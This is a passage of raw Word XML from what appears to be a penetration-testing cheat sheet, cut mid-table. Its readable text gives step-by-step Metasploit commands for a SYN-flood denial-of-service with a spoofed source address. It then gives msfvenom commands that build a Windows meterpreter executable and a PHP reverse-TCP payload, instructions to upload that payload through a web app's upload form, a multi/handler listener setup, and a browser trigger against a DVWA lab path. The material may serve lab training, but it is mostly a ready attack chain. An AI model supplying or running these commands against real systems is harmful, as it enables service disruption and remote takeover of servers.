              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="795E79BF" w14:textId="6B615D44" w:rsidR="00273CC0" w:rsidRDefault="00273CC0" w:rsidP="0028087A">
            <w:r>
              <w:t>To use metasploit to launch a DoS attack, simply use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">use </w:t>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>auxiliary/dos/tcp/synflood</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">RHOST </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">RPORT </w:t>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>(Target port you want to attack)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">SHOST </w:t>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>SPOOF.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>exploit</w:t>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00273CC0">
              <w:tab/>
              <w:t>(Or, run)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028087A" w14:paraId="38FFB237" w14:textId="77777777" w:rsidTr="0028087A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4FF7EA2A" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="74DF1AF5" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E1A10B5" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A" w:rsidP="0028087A"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6915FF54" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A"/>
    <w:p w14:paraId="3E3D90AA" w14:textId="77777777" w:rsidR="0028087A" w:rsidRDefault="0028087A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F06DEDE" w14:textId="775BD108" w:rsidR="0028087A" w:rsidRPr="00F15476" w:rsidRDefault="0028087A" w:rsidP="0028087A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSFvenom</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1036"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2394"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="003511E3" w14:paraId="377EE0A1" w14:textId="77777777" w:rsidTr="003511E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F43DE51" w14:textId="7F38A414" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19B4BD91" w14:textId="73CB58DF" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfvemon</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0028087A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(msfvenom is installed in Kali Linux by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45D92C22" w14:textId="56E37962" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>MSFvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. msfvenom replaced both msfpayload and msfencode as of June 8th, 2015. The advantages of msfvenom are:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>+One single tool</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>+Standardized command line options</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>+Increased speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003511E3" w14:paraId="47B235EA" w14:textId="77777777" w:rsidTr="003511E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="197C56E2" w14:textId="6282DB40" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="521DE023" w14:textId="77777777" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F2C75DB" w14:textId="6A4186C4" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>MSFvenom has a lot of options to go alone with the command, for example:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">windows/meterpreter_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--platform </w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>windows</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>x86</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f </w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>exe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LHOST=</w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>HOST.MACHINE.IP.ADDRESS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LPORT=</w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-o </w:t>
            </w:r>
            <w:r w:rsidRPr="00185ABA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/root/Desktop/FILE.exe</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003627CD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(All one command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003511E3" w14:paraId="3B8AE144" w14:textId="77777777" w:rsidTr="003511E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6ACB37FC" w14:textId="22500E2C" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="112FABB8" w14:textId="77777777" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="471D3981" w14:textId="1DCBB44E" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>You can create a simple reverse tcp payload for PHP using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003627CD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="003627CD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="003627CD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">php/meterpreter/reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="003627CD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LHOST=</w:t>
            </w:r>
            <w:r w:rsidRPr="003627CD">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>YOUR.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003627CD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LPORT=</w:t>
            </w:r>
            <w:r w:rsidRPr="003627CD">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003627CD">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f </w:t>
            </w:r>
            <w:r w:rsidRPr="003627CD">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>raw</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(All one command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71C4B057" w14:textId="77777777" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r w:rsidRPr="003627CD">
              <w:t>The raw payload will be output in the terminal window, so highlight it all and copy and paste the script into a text editor such as Sublime or Vim.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Then save it!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B6E50BB" w14:textId="77777777" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>This file can now be usefully uploaded if a web page has an upload function for the user. If the web app tells you where the file has been uploaded to, this is great.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CDB7E58" w14:textId="2E434005" w:rsidR="003511E3" w:rsidRPr="003627CD" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>If you are unsure where it has been uploaded to, command injection may be a possible technique to try and discover where the file has been saved to.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003511E3" w14:paraId="46411CDB" w14:textId="77777777" w:rsidTr="003511E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="09CB8238" w14:textId="503F2651" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5F4F5F74" w14:textId="0A23F890" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="030DDF6D" w14:textId="6602E2C9" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>If the file is successfully uploaded, now try:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">use </w:t>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>exploit/multi/handler</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LHOST</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>YOUR.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">LPORT </w:t>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>payload php/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003511E3" w14:paraId="7842CC8A" w14:textId="77777777" w:rsidTr="003511E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4077CBE4" w14:textId="240DF95C" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4ED5C6D0" w14:textId="14B9EB3B" w:rsidR="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Web Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A39035C" w14:textId="3696CEA5" w:rsidR="003511E3" w:rsidRPr="003511E3" w:rsidRDefault="003511E3" w:rsidP="003511E3">
            <w:r>
              <w:t>One way to trigger the web app to run the uploaded script is to use a web browser:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> http://10.10.10.16:8080/dvwa/hackable/uploads/</w:t>
            </w:r>
            <w:r w:rsidRPr="003511E3">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>upload.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t>Once this is entered in the web browser address bar, check back to your msfconsole.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00411D5E" w14:paraId="7BAADE73" w14:textId="77777777" w:rsidTr="003511E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="55C532F8" w14:textId="4AE6C080" w:rsidR="00411D5E" w:rsidRDefault="00411D5E" w:rsidP="003511E3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="094138F3" w14:textId="229FD565" w:rsidR="00411D5E" w:rsidRDefault="00411D5E" w:rsidP="003511E3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>burp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
